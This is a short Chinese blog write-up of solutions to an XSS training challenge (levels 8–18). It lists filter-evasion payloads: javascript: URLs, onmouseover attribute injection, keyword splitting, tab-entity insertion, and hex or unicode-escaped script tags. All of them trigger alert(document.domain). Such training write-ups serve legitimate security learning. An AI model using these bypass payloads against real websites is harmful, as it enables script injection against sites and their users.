xss challenge 解题思路(8-18)

challenge 8:

 

js伪协议的应用,请使用ie浏览器

输入如下javascript:alert(document.domain);

challenge 9 :

 

提示要用utf-7 xss来做,不过我是没做出来。

 

challenge 10:

这次发现过滤了domain,可以如下构造" onmouseover=alert(document.domadomainin);  这样过滤掉domain后会构成新的domain

challenge 11

"><a href="javascr&#09;ipt:alert(document.domain);">12</a>
思路,用&#09(转义制表符) 来逃避过滤,&#09需要用在url中,所以构建一个超链接。


点击可以过关。


challenge 12:


发现其过滤了”<> 。 用ie浏览器可以用两个反单引号去闭合value,浏览器不会自动添加“。、
``onmouseover=alert(document.domain);
貌似这个方法在火狐上是不行的。

challenge 13:

challenge 14:、

以上两题可在ie8内核上实现,由于该漏洞不再具有时效性,此处略


challenge 15
观察得,文本框中的内容被放在document.writer中,但后面的内容经过了过滤
可以使用16进制ASCII码进行转义,
然后发现\被和谐了,so使用两个\对\进行转义
代码如下 \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
提交弹窗。



challenge 16:

原理同challenge15 这次不能用16进制转义,可采用10进制或八进制
以8进制为例
\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

提交弹窗成功


challenge 17:
challenge 18

不具有时效性的题,我们还是跳过吧




posted @ 2014-11-29 16:03  o-i  阅读(854)  评论(0编辑  收藏  举报